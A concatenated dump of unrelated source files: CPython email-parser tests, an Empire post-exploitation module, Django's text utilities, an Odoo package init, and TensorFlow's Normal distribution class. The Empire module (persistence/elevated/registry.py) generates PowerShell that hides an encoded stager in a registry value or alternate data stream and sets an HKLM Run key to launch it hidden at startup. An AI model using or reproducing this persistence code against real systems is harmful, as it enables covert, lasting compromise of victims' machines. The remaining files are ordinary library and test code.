'Foo x@example.com[],'
'"Nobody Is. Special" < example. com>'),
[errors.InvalidHeaderDefect, # invalid address in list
errors.InvalidHeaderDefect, # 'Foo x' local part invalid.
errors.InvalidHeaderDefect, # Missing . in 'Foo x' local part
errors.ObsoleteHeaderDefect, # period in 'Is.' disp-name phrase
errors.InvalidHeaderDefect, # no domain part in addr-spec
errors.ObsoleteHeaderDefect], # addr-spec has comment in it
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 1)
self.assertEqual(len(address_list.all_mailboxes), 3)
self.assertEqual([str(x) for x in address_list.all_mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list.mailboxes[0].token_type, 'mailbox')
self.assertEqual(address_list.addresses[0].token_type, 'address')
self.assertEqual(address_list.addresses[1].token_type, 'address')
self.assertEqual(len(address_list.addresses[0].mailboxes), 1)
self.assertEqual(len(address_list.addresses[1].mailboxes), 0)
self.assertEqual(len(address_list.addresses[1].mailboxes), 0)
self.assertEqual(
address_list.addresses[1].all_mailboxes[0].local_part, 'Foo x')
self.assertEqual(
address_list.addresses[2].all_mailboxes[0].display_name,
"Nobody Is. Special")
def test_get_address_list_group_empty(self):
address_list = self._test_get_x(parser.get_address_list,
'Monty Python: ;',
'Monty Python: ;',
'Monty Python: ;',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 0)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual(len(address_list.addresses), 1)
self.assertEqual(address_list.addresses[0].token_type, 'address')
self.assertEqual(address_list.addresses[0].display_name, 'Monty Python')
self.assertEqual(len(address_list.addresses[0].mailboxes), 0)
def test_get_address_list_group_simple(self):
address_list = self._test_get_x(parser.get_address_list,
'Monty Python: dinsdale@example.com;',
'Monty Python: dinsdale@example.com;',
'Monty Python: dinsdale@example.com;',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 1)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list.addresses[0].display_name,
'Monty Python')
self.assertEqual(address_list.addresses[0].mailboxes[0].domain,
'example.com')
def test_get_address_list_group_and_mailboxes(self):
address_list = self._test_get_x(parser.get_address_list,
('Monty Python: dinsdale@example.com, "Fred" <flint@example.com>;, '
'Abe <x@example.com>, Bee <y@example.com>'),
('Monty Python: dinsdale@example.com, "Fred" <flint@example.com>;, '
'Abe <x@example.com>, Bee <y@example.com>'),
('Monty Python: dinsdale@example.com, "Fred" <flint@example.com>;, '
'Abe <x@example.com>, Bee <y@example.com>'),
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 4)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual(len(address_list.addresses), 3)
self.assertEqual(address_list.mailboxes[0].local_part, 'dinsdale')
self.assertEqual(address_list.addresses[0].display_name,
'Monty Python')
self.assertEqual(address_list.addresses[0].mailboxes[0].domain,
'example.com')
self.assertEqual(address_list.addresses[0].mailboxes[1].local_part,
'flint')
self.assertEqual(address_list.addresses[1].mailboxes[0].local_part,
'x')
self.assertEqual(address_list.addresses[2].mailboxes[0].local_part,
'y')
self.assertEqual(str(address_list.addresses[1]),
str(address_list.mailboxes[2]))
def test_invalid_content_disposition(self):
content_disp = self._test_parse_x(
parser.parse_content_disposition_header,
";attachment", "; attachment", ";attachment",
[errors.InvalidHeaderDefect]*2
)
def test_invalid_content_transfer_encoding(self):
cte = self._test_parse_x(
parser.parse_content_transfer_encoding_header,
";foo", ";foo", ";foo", [errors.InvalidHeaderDefect]*3
)
@parameterize
class Test_parse_mime_version(TestParserMixin, TestEmailBase):
def mime_version_as_value(self,
value,
tl_str,
tl_value,
major,
minor,
defects):
mime_version = self._test_parse_x(parser.parse_mime_version,
value, tl_str, tl_value, defects)
self.assertEqual(mime_version.major, major)
self.assertEqual(mime_version.minor, minor)
mime_version_params = {
'rfc_2045_1': (
'1.0',
'1.0',
'1.0',
1,
0,
[]),
'RFC_2045_2': (
'1.0 (produced by MetaSend Vx.x)',
'1.0 (produced by MetaSend Vx.x)',
'1.0 ',
1,
0,
[]),
'RFC_2045_3': (
'(produced by MetaSend Vx.x) 1.0',
'(produced by MetaSend Vx.x) 1.0',
' 1.0',
1,
0,
[]),
'RFC_2045_4': (
'1.(produced by MetaSend Vx.x)0',
'1.(produced by MetaSend Vx.x)0',
'1. 0',
1,
0,
[]),
'empty': (
'',
'',
'',
None,
None,
[errors.HeaderMissingRequiredValue]),
}
class TestFolding(TestEmailBase):
policy = policy.default
def _test(self, tl, folded, policy=policy):
self.assertEqual(tl.fold(policy=policy), folded, tl.ppstr())
def test_simple_unstructured_no_folds(self):
self._test(parser.get_unstructured("This is a test"),
"This is a test\n")
def test_simple_unstructured_folded(self):
self._test(parser.get_unstructured("This is also a test, but this "
"time there are enough words (and even some "
"symbols) to make it wrap; at least in theory."),
"This is also a test, but this time there are enough "
"words (and even some\n"
" symbols) to make it wrap; at least in theory.\n")
def test_unstructured_with_unicode_no_folds(self):
self._test(parser.get_unstructured("hübsch kleiner beißt"),
"=?utf-8?q?h=C3=BCbsch_kleiner_bei=C3=9Ft?=\n")
def test_one_ew_on_each_of_two_wrapped_lines(self):
self._test(parser.get_unstructured("Mein kleiner Kaktus ist sehr "
"hübsch. Es hat viele Stacheln "
"und oft beißt mich."),
"Mein kleiner Kaktus ist sehr =?utf-8?q?h=C3=BCbsch=2E?= "
"Es hat viele Stacheln\n"
" und oft =?utf-8?q?bei=C3=9Ft?= mich.\n")
def test_ews_combined_before_wrap(self):
self._test(parser.get_unstructured("Mein Kaktus ist hübsch. "
"Es beißt mich. "
"And that's all I'm sayin."),
"Mein Kaktus ist =?utf-8?q?h=C3=BCbsch=2E__Es_bei=C3=9Ft?= "
"mich. And that's\n"
" all I'm sayin.\n")
# XXX Need test of an encoded word so long that it needs to be wrapped
def test_simple_address(self):
self._test(parser.get_address_list("abc <xyz@example.com>")[0],
"abc <xyz@example.com>\n")
def test_address_list_folding_at_commas(self):
self._test(parser.get_address_list('abc <xyz@example.com>, '
'"Fred Blunt" <sharp@example.com>, '
'"J.P.Cool" <hot@example.com>, '
'"K<>y" <key@example.com>, '
'Firesale <cheap@example.com>, '
'<end@example.com>')[0],
'abc <xyz@example.com>, "Fred Blunt" <sharp@example.com>,\n'
' "J.P.Cool" <hot@example.com>, "K<>y" <key@example.com>,\n'
' Firesale <cheap@example.com>, <end@example.com>\n')
def test_address_list_with_unicode_names(self):
self._test(parser.get_address_list(
'Hübsch Kaktus <beautiful@example.com>, '
'beißt beißt <biter@example.com>')[0],
'=?utf-8?q?H=C3=BCbsch?= Kaktus <beautiful@example.com>,\n'
' =?utf-8?q?bei=C3=9Ft_bei=C3=9Ft?= <biter@example.com>\n')
def test_address_list_with_unicode_names_in_quotes(self):
self._test(parser.get_address_list(
'"Hübsch Kaktus" <beautiful@example.com>, '
'"beißt" beißt <biter@example.com>')[0],
'=?utf-8?q?H=C3=BCbsch?= Kaktus <beautiful@example.com>,\n'
' =?utf-8?q?bei=C3=9Ft_bei=C3=9Ft?= <biter@example.com>\n')
# XXX Need tests with comments on various sides of a unicode token,
# and with unicode tokens in the comments. Spaces inside the quotes
# currently don't do the right thing.
def test_initial_whitespace_splitting(self):
body = parser.get_unstructured(' ' + 'x'*77)
header = parser.Header([
parser.HeaderLabel([parser.ValueTerminal('test:', 'atext')]),
parser.CFWSList([parser.WhiteSpaceTerminal(' ', 'fws')]), body])
self._test(header, 'test: \n ' + 'x'*77 + '\n')
def test_whitespace_splitting(self):
self._test(parser.get_unstructured('xxx ' + 'y'*77),
'xxx \n ' + 'y'*77 + '\n')
if __name__ == '__main__':
unittest.main()
|
pyq881120/Empire
|
refs/heads/master
|
lib/modules/persistence/elevated/registry.py
|
13
|
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Registry',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run '
'registry key. This has an easy detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'KeyName' : {
'Description' : 'Key name for the run trigger.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
keyName = self.options['KeyName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "Remove-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";"
script += "'Registry persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
# store the script in the specified alternate data stream location
if adsPath != '':
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''more < "+adsPath+"\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath + "."
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
script += "'Registry persistence established "+statusMsg+"'"
return script
|
ashishnitinpatil/django_appengine_project_template
|
refs/heads/master
|
django/utils/text.py
|
104
|
from __future__ import unicode_literals
import re
import unicodedata
from gzip import GzipFile
from io import BytesIO
from django.utils.encoding import force_text
from django.utils.functional import allow_lazy, SimpleLazyObject
from django.utils import six
from django.utils.six.moves import html_entities
from django.utils.translation import ugettext_lazy, ugettext as _, pgettext
from django.utils.safestring import mark_safe
if six.PY2:
# Import force_unicode even though this module doesn't use it, because some
# people rely on it being here.
from django.utils.encoding import force_unicode
# Capitalizes the first letter of a string.
capfirst = lambda x: x and force_text(x)[0].upper() + force_text(x)[1:]
capfirst = allow_lazy(capfirst, six.text_type)
# Set up regular expressions
re_words = re.compile(r'&.*?;|<.*?>|(\w[\w-]*)', re.U|re.S)
re_tag = re.compile(r'<(/)?([^ ]+?)(?:(\s*/)| .*?)?>', re.S)
def wrap(text, width):
"""
A word-wrap function that preserves existing line breaks and most spaces in
the text. Expects that existing line breaks are posix newlines.
"""
text = force_text(text)
def _generator():
it = iter(text.split(' '))
word = next(it)
yield word
pos = len(word) - word.rfind('\n') - 1
for word in it:
if "\n" in word:
lines = word.split('\n')
else:
lines = (word,)
pos += len(lines[0]) + 1
if pos > width:
yield '\n'
pos = len(lines[-1])
else:
yield ' '
if len(lines) > 1:
pos = len(lines[-1])
yield word
return ''.join(_generator())
wrap = allow_lazy(wrap, six.text_type)
class Truncator(SimpleLazyObject):
"""
An object used to truncate text, either by characters or words.
"""
def __init__(self, text):
super(Truncator, self).__init__(lambda: force_text(text))
def add_truncation_text(self, text, truncate=None):
if truncate is None:
truncate = pgettext(
'String to return when truncating text',
'%(truncated_text)s...')
truncate = force_text(truncate)
if '%(truncated_text)s' in truncate:
return truncate % {'truncated_text': text}
# The truncation text didn't contain the %(truncated_text)s string
# replacement argument so just append it to the text.
if text.endswith(truncate):
# But don't append the truncation text if the current text already
# ends in this.
return text
return '%s%s' % (text, truncate)
def chars(self, num, truncate=None):
"""
Returns the text truncated to be no longer than the specified number
of characters.
Takes an optional argument of what should be used to notify that the
string has been truncated, defaulting to a translatable string of an
ellipsis (...).
"""
length = int(num)
text = unicodedata.normalize('NFC', self._wrapped)
# Calculate the length to truncate to (max length - end_text length)
truncate_len = length
for char in self.add_truncation_text('', truncate):
if not unicodedata.combining(char):
truncate_len -= 1
if truncate_len == 0:
break
s_len = 0
end_index = None
for i, char in enumerate(text):
if unicodedata.combining(char):
# Don't consider combining characters
# as adding to the string length
continue
s_len += 1
if end_index is None and s_len > truncate_len:
end_index = i
if s_len > length:
# Return the truncated string
return self.add_truncation_text(text[:end_index or 0],
truncate)
# Return the original string since no truncation was necessary
return text
chars = allow_lazy(chars)
def words(self, num, truncate=None, html=False):
"""
Truncates a string after a certain number of words. Takes an optional
argument of what should be used to notify that the string has been
truncated, defaulting to ellipsis (...).
"""
length = int(num)
if html:
return self._html_words(length, truncate)
return self._text_words(length, truncate)
words = allow_lazy(words)
def _text_words(self, length, truncate):
"""
Truncates a string after a certain number of words.
Newlines in the string will be stripped.
"""
words = self._wrapped.split()
if len(words) > length:
words = words[:length]
return self.add_truncation_text(' '.join(words), truncate)
return ' '.join(words)
def _html_words(self, length, truncate):
"""
Truncates HTML to a certain number of words (not counting tags and
comments). Closes opened tags if they were correctly closed in the
given HTML.
Newlines in the HTML are preserved.
"""
if length <= 0:
return ''
html4_singlets = (
'br', 'col', 'link', 'base', 'img',
'param', 'area', 'hr', 'input'
)
# Count non-HTML words and keep note of open tags
pos = 0
end_text_pos = 0
words = 0
open_tags = []
while words <= length:
m = re_words.search(self._wrapped, pos)
if not m:
# Checked through whole string
break
pos = m.end(0)
if m.group(1):
# It's an actual non-HTML word
words += 1
if words == length:
end_text_pos = pos
continue
# Check for tag
tag = re_tag.match(m.group(0))
if not tag or end_text_pos:
# Don't worry about non tags or tags after our truncate point
continue
closing_tag, tagname, self_closing = tag.groups()
# Element names are always case-insensitive
tagname = tagname.lower()
if self_closing or tagname in html4_singlets:
pass
elif closing_tag:
# Check for match in open tags list
try:
i = open_tags.index(tagname)
except ValueError:
pass
else:
# SGML: An end tag closes, back to the matching start tag,
# all unclosed intervening start tags with omitted end tags
open_tags = open_tags[i + 1:]
else:
# Add it to the start of the open tags list
open_tags.insert(0, tagname)
if words <= length:
# Don't try to close tags if we don't need to truncate
return self._wrapped
out = self._wrapped[:end_text_pos]
truncate_text = self.add_truncation_text('', truncate)
if truncate_text:
out += truncate_text
# Close any tags still open
for tag in open_tags:
out += '</%s>' % tag
# Return string
return out
def get_valid_filename(s):
"""
Returns the given string converted to a string that can be used for a clean
filename. Specifically, leading and trailing spaces are removed; other
spaces are converted to underscores; and anything that is not a unicode
alphanumeric, dash, underscore, or dot, is removed.
>>> get_valid_filename("john's portrait in 2004.jpg")
'johns_portrait_in_2004.jpg'
"""
s = force_text(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
get_valid_filename = allow_lazy(get_valid_filename, six.text_type)
def get_text_list(list_, last_word=ugettext_lazy('or')):
"""
>>> get_text_list(['a', 'b', 'c', 'd'])
'a, b, c or d'
>>> get_text_list(['a', 'b', 'c'], 'and')
'a, b and c'
>>> get_text_list(['a', 'b'], 'and')
'a and b'
>>> get_text_list(['a'])
'a'
>>> get_text_list([])
''
"""
if len(list_) == 0: return ''
if len(list_) == 1: return force_text(list_[0])
return '%s %s %s' % (
# Translators: This string is used as a separator between list elements
_(', ').join([force_text(i) for i in list_][:-1]),
force_text(last_word), force_text(list_[-1]))
get_text_list = allow_lazy(get_text_list, six.text_type)
def normalize_newlines(text):
return force_text(re.sub(r'\r\n|\r|\n', '\n', text))
normalize_newlines = allow_lazy(normalize_newlines, six.text_type)
def recapitalize(text):
"Recapitalizes text, placing caps after end-of-sentence punctuation."
text = force_text(text).lower()
capsRE = re.compile(r'(?:^|(?<=[\.\?\!] ))([a-z])')
text = capsRE.sub(lambda x: x.group(1).upper(), text)
return text
recapitalize = allow_lazy(recapitalize)
def phone2numeric(phone):
"Converts a phone number with letters into its numeric equivalent."
char2number = {'a': '2', 'b': '2', 'c': '2', 'd': '3', 'e': '3', 'f': '3',
'g': '4', 'h': '4', 'i': '4', 'j': '5', 'k': '5', 'l': '5', 'm': '6',
'n': '6', 'o': '6', 'p': '7', 'q': '7', 'r': '7', 's': '7', 't': '8',
'u': '8', 'v': '8', 'w': '9', 'x': '9', 'y': '9', 'z': '9',
}
return ''.join(char2number.get(c, c) for c in phone.lower())
phone2numeric = allow_lazy(phone2numeric)
# From http://www.xhaus.com/alan/python/httpcomp.html#gzip
# Used with permission.
def compress_string(s):
zbuf = BytesIO()
zfile = GzipFile(mode='wb', compresslevel=6, fileobj=zbuf)
zfile.write(s)
zfile.close()
return zbuf.getvalue()
class StreamingBuffer(object):
def __init__(self):
self.vals = []
def write(self, val):
self.vals.append(val)
def read(self):
ret = b''.join(self.vals)
self.vals = []
return ret
def flush(self):
return
def close(self):
return
# Like compress_string, but for iterators of strings.
def compress_sequence(sequence):
buf = StreamingBuffer()
zfile = GzipFile(mode='wb', compresslevel=6, fileobj=buf)
# Output headers...
yield buf.read()
for item in sequence:
zfile.write(item)
zfile.flush()
yield buf.read()
zfile.close()
yield buf.read()
ustring_re = re.compile("([\u0080-\uffff])")
def javascript_quote(s, quote_double_quotes=False):
def fix(match):
return "\\u%04x" % ord(match.group(1))
if type(s) == bytes:
s = s.decode('utf-8')
elif type(s) != six.text_type:
raise TypeError(s)
s = s.replace('\\', '\\\\')
s = s.replace('\r', '\\r')
s = s.replace('\n', '\\n')
s = s.replace('\t', '\\t')
s = s.replace("'", "\\'")
if quote_double_quotes:
s = s.replace('"', '"')
return str(ustring_re.sub(fix, s))
javascript_quote = allow_lazy(javascript_quote, six.text_type)
# Expression to match some_token and some_token="with spaces" (and similarly
# for single-quoted strings).
smart_split_re = re.compile(r"""
((?:
[^\s'"]*
(?:
(?:"(?:[^"\\]|\\.)*" | '(?:[^'\\]|\\.)*')
[^\s'"]*
)+
) | \S+)
""", re.VERBOSE)
def smart_split(text):
r"""
Generator that splits a string by spaces, leaving quoted phrases together.
Supports both single and double quotes, and supports escaping quotes with
backslashes. In the output, strings will keep their initial and trailing
quote marks and escaped quotes will remain escaped (the results can then
be further processed with unescape_string_literal()).
>>> list(smart_split(r'This is "a person\'s" test.'))
['This', 'is', '"a person\\\'s"', 'test.']
>>> list(smart_split(r"Another 'person\'s' test."))
['Another', "'person\\'s'", 'test.']
>>> list(smart_split(r'A "\"funky\" style" test.'))
['A', '"\\"funky\\" style"', 'test.']
"""
text = force_text(text)
for bit in smart_split_re.finditer(text):
yield bit.group(0)
def _replace_entity(match):
text = match.group(1)
if text[0] == '#':
text = text[1:]
try:
if text[0] in 'xX':
c = int(text[1:], 16)
else:
c = int(text)
return six.unichr(c)
except ValueError:
return match.group(0)
else:
try:
return six.unichr(html_entities.name2codepoint[text])
except (ValueError, KeyError):
return match.group(0)
_entity_re = re.compile(r"&(#?[xX]?(?:[0-9a-fA-F]+|\w{1,8}));")
def unescape_entities(text):
return _entity_re.sub(_replace_entity, text)
unescape_entities = allow_lazy(unescape_entities, six.text_type)
def unescape_string_literal(s):
r"""
Convert quoted string literals to unquoted strings with escaped quotes and
backslashes unquoted::
>>> unescape_string_literal('"abc"')
'abc'
>>> unescape_string_literal("'abc'")
'abc'
>>> unescape_string_literal('"a \"bc\""')
'a "bc"'
>>> unescape_string_literal("'\'ab\' c'")
"'ab' c"
"""
if s[0] not in "\"'" or s[-1] != s[0]:
raise ValueError("Not a string literal: %r" % s)
quote = s[0]
return s[1:-1].replace(r'\%s' % quote, quote).replace(r'\\', '\\')
unescape_string_literal = allow_lazy(unescape_string_literal)
def slugify(value):
"""
Converts to lowercase, removes non-word characters (alphanumerics and
underscores) and converts spaces to hyphens. Also strips leading and
trailing whitespace.
"""
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')
value = re.sub('[^\w\s-]', '', value).strip().lower()
return mark_safe(re.sub('[-\s]+', '-', value))
slugify = allow_lazy(slugify, six.text_type)
|
ingadhoc/product
|
refs/heads/13.0
|
product_uoms_sale/models/__init__.py
|
1
|
##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from . import product_uoms
from . import product_product
from . import sale_order_line
|
alheinecke/tensorflow-xsmm
|
refs/heads/master
|
tensorflow/contrib/distributions/python/ops/normal.py
|
7
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Normal (Gaussian) distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import kullback_leibler
from tensorflow.contrib.distributions.python.ops import special_math
from tensorflow.contrib.framework.python.framework import tensor_util as contrib_tensor_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
__all__ = [
"Normal",
"NormalWithSoftplusScale",
]
class Normal(distribution.Distribution):
"""The Normal distribution with location `loc` and `scale` parameters.
#### Mathematical details
The probability density function (pdf) is,
```none
pdf(x; mu, sigma) = exp(-0.5 (x - mu)**2 / sigma**2) / Z
Z = (2 pi sigma**2)**0.5
```
where `loc = mu` is the mean, `scale = sigma` is the std. deviation, and, `Z`
is the normalization constant.
The Normal distribution is a member of the [location-scale family](
https://en.wikipedia.org/wiki/Location-scale_family), i.e., it can be
constructed as,
```none
X ~ Normal(loc=0, scale=1)
Y = loc + scale * X
```
#### Examples
Examples of initialization of one or a batch of distributions.
```python
# Define a single scalar Normal distribution.
dist = tf.contrib.distributions.Normal(loc=0., scale=3.)
# Evaluate the cdf at 1, returning a scalar.
dist.cdf(1.)
# Define a batch of two scalar valued Normals.
# The first has mean 1 and standard deviation 11, the second 2 and 22.
dist = tf.contrib.distributions.Normal(loc=[1, 2.], scale=[11, 22.])
# Evaluate the pdf of the first distribution on 0, and the second on 1.5,
# returning a length two tensor.
dist.prob([0, 1.5])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
Arguments are broadcast when possible.
```python
# Define a batch of two scalar valued Normals.
# Both have mean 1, but different standard deviations.
dist = tf.contrib.distributions.Normal(loc=1., scale=[11, 22.])
# Evaluate the pdf of both distributions on the same point, 3.0,
# returning a length 2 tensor.
dist.prob(3.0)
```
"""
def __init__(self,
loc,
scale,
validate_args=False,
allow_nan_stats=True,
name="Normal"):
"""Construct Normal distributions with mean and stddev `loc` and `scale`.
The parameters `loc` and `scale` must be shaped in a way that supports
broadcasting (e.g. `loc + scale` is a valid operation).
Args:
loc: Floating point tensor; the means of the distribution(s).
scale: Floating point tensor; the stddevs of the distribution(s).
Must contain only positive values.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value "`NaN`" to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
Raises:
TypeError: if `loc` and `scale` have different `dtype`.
"""
parameters = locals()
with ops.name_scope(name, values=[loc, scale]) as ns:
with ops.control_dependencies([check_ops.assert_positive(scale)] if
validate_args else []):
self._loc = array_ops.identity(loc, name="loc")
self._scale = array_ops.identity(scale, name="scale")
contrib_tensor_util.assert_same_float_dtype([self._loc, self._scale])
super(Normal, self).__init__(
dtype=self._scale.dtype,
reparameterization_type=distribution.FULLY_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._loc, self._scale],
name=ns)
@staticmethod
def _param_shapes(sample_shape):
return dict(
zip(("loc", "scale"), ([ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32)] * 2)))
@property
def loc(self):
"""Distribution parameter for the mean."""
return self._loc
@property
def scale(self):
"""Distribution parameter for standard deviation."""
return self._scale
def _batch_shape_tensor(self):
return array_ops.broadcast_dynamic_shape(
array_ops.shape(self.loc),
array_ops.shape(self.scale))
def _batch_shape(self):
return array_ops.broadcast_static_shape(
self.loc.get_shape(),
self.scale.get_shape())
def _event_shape_tensor(self):
return constant_op.constant([], dtype=dtypes.int32)
def _event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
shape = array_ops.concat([[n], self.batch_shape_tensor()], 0)
sampled = random_ops.random_normal(
shape=shape, mean=0., stddev=1., dtype=self.loc.dtype, seed=seed)
return sampled * self.scale + self.loc
def _log_prob(self, x):
return self._log_unnormalized_prob(x) - self._log_normalization()
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _log_cdf(self, x):
return special_math.log_ndtr(self._z(x))
def _cdf(self, x):
return special_math.ndtr(self._z(x))
def _log_survival_function(self, x):
return special_math.log_ndtr(-self._z(x))
def _survival_function(self, x):
return special_math.ndtr(-self._z(x))
def _log_unnormalized_prob(self, x):
return -0.5 * math_ops.square(self._z(x))
def _log_normalization(self):
return 0.5 * math.log(2. * math.pi) + math_ops.log(self.scale)
def _entropy(self):
# Use broadcasting rules to calculate the full broadcast scale.
scale = self.scale * array_ops.ones_like(self.loc)
return 0.5 * math.log(2. * math.pi * math.e) + math_ops.log(scale)
def _mean(self):
return self.loc * array_ops.ones_like(self.scale)
def _stddev(self):
return self.scale * array_ops.ones_like(self.loc)
def _mode(self):
return self._mean()
def _z(self, x):
"""Standardize input `x` to a unit normal."""
with ops.name_scope("standardize", values=[x]):
return (x - self.loc) / self.scale
class NormalWithSoftplusScale(Normal):
"""Normal with softplus applied to `scale`."""
def __init__(self,
loc,
scale,
validate_args=False,
allow_nan_stats=True,
name="NormalWithSoftplusScale"):
parameters = locals()
with ops.name_scope(name, values=[scale]) as ns:
super(NormalWithSoftplusScale, self).__init__(
loc=loc,
scale=nn.softplus(scale, name="softplus_scale"),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=ns)
self._parameters = parameters
